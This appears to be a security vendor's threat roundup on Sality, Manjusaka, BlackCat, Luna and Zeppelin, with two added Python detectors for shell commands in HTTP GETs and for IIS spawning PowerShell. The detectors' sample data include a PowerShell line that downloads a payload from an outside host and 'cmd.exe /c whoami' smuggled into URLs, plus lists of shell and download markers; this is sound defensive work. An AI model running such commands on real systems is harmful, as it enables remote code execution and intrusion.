Our research team compiled the latest updates on newly announced CVEs, recent ransomware attacks including BlackCat & Luna, and IoT security news. They also offer analysis of the potential impacts and their expert recommendations:
Sality Malware Infecting ICS Using a Password Recovery Tool
A threat actor is infecting ICS to create a botnet through password “cracking” software for PLCs and HMIs. In one incident, the tool exploited CVE-2022-2003 in DirectLogic PLCs from Automation Direct to extract the password and dropped Sality, a piece of malware that creates a peer-to-peer botnet.
Affected Vendors: This recovery tool promises to unlock PLCs and HMIs from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Schneider Electric, Allen Bradley, Weintek, ABB, and Panasonic.
Attack Parameters: The exploit used by the tool can be done over serial-only communications, as well as over Ethernet.
Impact: Sality can terminate processes, open connections to remote sites, download additional payloads, or steal data from the host. It can also inject itself into running processes and copy itself onto network shares, external drives, and removable storage devices that could carry it to other systems.
In this case, it appeared to be focused on stealing cryptocurrency.
Recommendations: Automation Direct has released a patch for the exploited vulnerability.
SCADAfence Coverage: The vulnerabilities exploited in this attack are included in the CVE DB.
Manjusaka Post-Exploitation Attack Framework
A new post-exploitation attack framework, Manjusaka, an alternative to Cobalt Strike, was observed in the wild.
Attack Parameters: Manjusaka uses implants written in Rust, while its binaries are written in GoLang. Its RAT implants support command execution, file access, network reconnaissance, and more, so hackers can use it for the same operational goals as Cobalt Strike.
The implant can execute arbitrary commands using “cmd.exe”, get file information, get current network connections, collect browser credentials, take screenshots, obtain system information, and activate the file management module.
The infection chain includes a malicious document that executes to fetch a second-stage payload, Cobalt Strike, and load it in memory. Cobalt Strike is later used to download Manjusaka implants.
The C2 communications are executed via HTTP GET requests.
Impact: Right now, it looks like Manjusaka is tentatively deployed for testing, so its development is likely not in its final phases. However, it is already powerful enough for real-world use.
Recommendations: Track HTTP activity for potential attacks using the User Activity Analyzer.
SCADAfence Coverage: The SCADAfence Platform detects the use of Cobalt Strike. The SCADAfence Platform also detects command execution via HTTP GET requests and via “cmd.exe”.
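The recommendation above is to watch HTTP traffic for command execution carried in GET requests. The script below is an added example of what such a check looks like; it is not SCADAfence Platform code and does not reproduce Manjusaka's protocol. It assumes web-server access logs in Combined Log Format, URL-decodes paths and query values repeatedly (so double-encoded values are normalised), and flags GET requests whose decoded URL contains a shell-interpreter marker such as `cmd.exe`. The log lines are constructed for the demo.

```python
"""Flag HTTP GET requests whose URL carries shell-interpreter content (e.g. cmd.exe).

Added example; not SCADAfence Platform code. Assumes Combined Log Format access
logs. SAMPLE_LOG below is constructed for the demo (RFC 1918 addresses).
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined Log Format: ip - - [ts] "METHOD path HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Markers that indicate a shell interpreter is being driven through a URL.
SHELL_MARKERS = ("cmd.exe", "cmd /c", "cmd.exe /c", "powershell")


def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded values (%2563 -> %63 -> c) are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    match = LOG_RE.match(line)
    if not match:
        return None
    rec = match.groupdict()
    parts = urlsplit(rec["path"])
    rec["decoded_path"] = decode_fully(parts.path)
    # parse_qsl decodes once; decode_fully catches a further encoding layer.
    rec["query"] = [(k, decode_fully(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return rec


def shell_markers_in(rec: dict) -> list:
    """Return the shell markers found in the decoded path or any query value."""
    haystack = (rec["decoded_path"] + " " + " ".join(v for _, v in rec["query"])).lower()
    return [m for m in SHELL_MARKERS if m in haystack]


def scan(lines) -> list:
    """Return (ip, timestamp, markers, raw_path) for every GET that carries a shell marker."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        found = shell_markers_in(rec)
        if found:
            hits.append((rec["ip"], rec["ts"], found, rec["path"]))
    return hits


# Constructed sample log: one plain page view, two suspicious GETs (the second is
# double-encoded), one POST, and one benign search term that must not match.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2022:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Aug/2022:10:15:07 +0000] "GET /api/run?c=cmd.exe%20%2Fc%20whoami HTTP/1.1" 200 51 "-" "-"',
    '10.0.0.7 - - [01/Aug/2022:10:15:09 +0000] "GET /api/run?c=%2563md.exe HTTP/1.1" 200 51 "-" "-"',
    '10.0.0.9 - - [01/Aug/2022:10:16:00 +0000] "POST /upload HTTP/1.1" 201 0 "-" "curl/7.79"',
    '10.0.0.5 - - [01/Aug/2022:10:16:30 +0000] "GET /search?q=command+line HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, markers, path in scan(SAMPLE_LOG):
        print(f"{ts} {ip} markers={markers} path={path}")
```

Running the script reports the two requests from 10.0.0.7 and nothing else; the search for "command line" is not flagged because the markers require the interpreter name, not the word "command". In production the same check would run on a tap or proxy log rather than a static list, and the marker list would be tuned to the interpreters present in the environment.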
BlackCat Attack on European Gas Pipeline
The ALPHV ransomware gang, BlackCat, claimed responsibility for a ransomware attack against Creos Luxembourg S.A., a natural gas pipeline and electricity network operator in the central European country.
Attack Parameters: BlackCat has been observed using multiple tools in its attacks, such as Mimikatz to recover stored passwords. The ransomware exploits the ProxyShell and ProxyLogon vulnerabilities to gain remote access and the ability to execute arbitrary code and commands. This is used for spawning a PowerShell process that downloads a Cobalt Strike beacon.
Impact: The customer portals of Encevo and Creos were unavailable, but there was no interruption in the provided services. The group claims to have exfiltrated roughly 150 Gb of information, including contracts, agreements, passports, bills, and emails.
SCADAfence Coverage: The SCADAfence Platform detects the use of Mimikatz and Cobalt Strike, as well as the exploitation of the ProxyShell vulnerability.
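The chain described above (Exchange exploited, then a PowerShell process spawned to download a beacon) is visible on the host as an IIS worker process starting a shell. The script below is an added example of that process-tree check; it is not SCADAfence Platform code. It assumes process-creation events with Sysmon Event ID 1-style fields (`Image`, `ParentImage`, `CommandLine`, `Computer`); the events are constructed for the demo and use a TEST-NET address.

```python
"""Flag shells spawned by an IIS worker process (w3wp.exe), as seen when a web
server exploit is used to launch PowerShell.

Added example; not SCADAfence Platform code. Assumes Sysmon Event ID 1-style
fields. SAMPLE_EVENTS below are constructed for the demo.
"""
import re
from pathlib import PureWindowsPath

WEB_WORKERS = {"w3wp.exe"}                            # IIS worker that hosts Exchange
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Substrings that show the command line pulls content from the network.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "http://", "https://")
ENCODED_FLAG = re.compile(r"\s-e(nc(odedcommand)?)?\s")  # -e / -enc / -encodedcommand


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path ('' if the field is missing)."""
    return PureWindowsPath(image).name.lower()


def suspicious_chain(evt: dict) -> list:
    """Return the reasons this event matches the web-worker-to-shell pattern, or []."""
    parent = basename(evt.get("ParentImage", ""))
    child = basename(evt.get("Image", ""))
    cmd = evt.get("CommandLine", "").lower()
    if parent not in WEB_WORKERS or child not in SHELLS:
        return []
    reasons = [f"{parent} spawned {child}"]
    hints = [h for h in DOWNLOAD_HINTS if h in cmd]
    if hints:
        reasons.append("command line fetches remote content: " + ", ".join(hints))
    if ENCODED_FLAG.search(cmd):
        reasons.append("encoded command")
    return reasons


def scan_events(events) -> list:
    """Return (computer, child image name, reasons) for every matching event."""
    hits = []
    for evt in events:
        reasons = suspicious_chain(evt)
        if reasons:
            hits.append((evt.get("Computer", "?"), basename(evt.get("Image", "")), reasons))
    return hits


# Constructed events: the normal w3wp start, a PowerShell download spawned by
# w3wp, an interactive PowerShell from explorer (benign), and cmd.exe from w3wp.
SAMPLE_EVENTS = [
    {"Computer": "EXCH01",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "MSExchangeOWAAppPool"'},
    {"Computer": "EXCH01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c "
                    "\"(New-Object Net.WebClient).DownloadString('http://203.0.113.10/payload')\""},
    {"Computer": "WS42",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"Computer": "EXCH01",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for computer, child, reasons in scan_events(SAMPLE_EVENTS):
        print(f"{computer}: {child}: {'; '.join(reasons)}")
```

The parent/child pair alone is the alert condition; the download and encoding checks only add severity, so a plain `cmd.exe` child of `w3wp.exe` is still reported. On a real Exchange server, legitimate children of w3wp.exe are rare enough that this rule is low-noise, but any scheduled-task or management agent that is known to spawn a shell from the worker should be allow-listed by full command line rather than by image name.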
Luna Cross-Platform Ransomware
A new ransomware, dubbed Luna, can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems.
Attack Parameters: The ransomware is written in Rust, enabling attackers to port it to multiple platforms and enabling it to evade automated static code analysis attempts.
The ransomware appears to be specifically tailored to be used only by Russian-speaking threat actors.
Impact: Luna confirms the latest trend of developing cross-platform ransomware in languages like Rust and Golang, producing malware capable of targeting multiple operating systems with little to no changes.
SCADAfence Coverage: The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet.
The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
Zeppelin Ransomware Joint Advisory
CISA and the FBI released a joint advisory detailing IOCs and TTPs of Zeppelin ransomware, a RaaS that encrypts victims' files multiple times. The group was also seen using the double-extortion method.
Targets: Zeppelin was observed targeting businesses and critical infrastructure organizations such as defense contractors and technology companies, with a focus on entities from the healthcare and medical industries.
Attack Parameters: The group gains access to victim networks through RDP exploitation, exploitation of SonicWall firewall vulnerabilities, and phishing campaigns. Zeppelin executed its malware multiple times within a victim's network, creating different IDs or file extensions and leaving the victim needing several unique decryption keys.
Impact: Zeppelin actors have been known to request ransom payments in Bitcoin, with initial amounts ranging from several thousand dollars to over a million dollars.
SCADAfence Coverage: RDP connections can be tracked using the User Activity Analyzer.
The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet. The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
The following are additional best-practice recommendations to protect against all strains of malware and ransomware:
- Make sure secure offline backups of critical systems are available and up-to-date.
- Apply the latest security patches on the assets in the network.
- Use unique passwords and multi-factor authentication on authentication paths to OT assets.
- Encrypt sensitive data when possible.
- Educate staff about the risks and methods of ransomware attacks and how to avoid infection.
For more information on keeping your ICS/OT systems protected from threats, or to see the SCADAfence platform in action, request a demo now.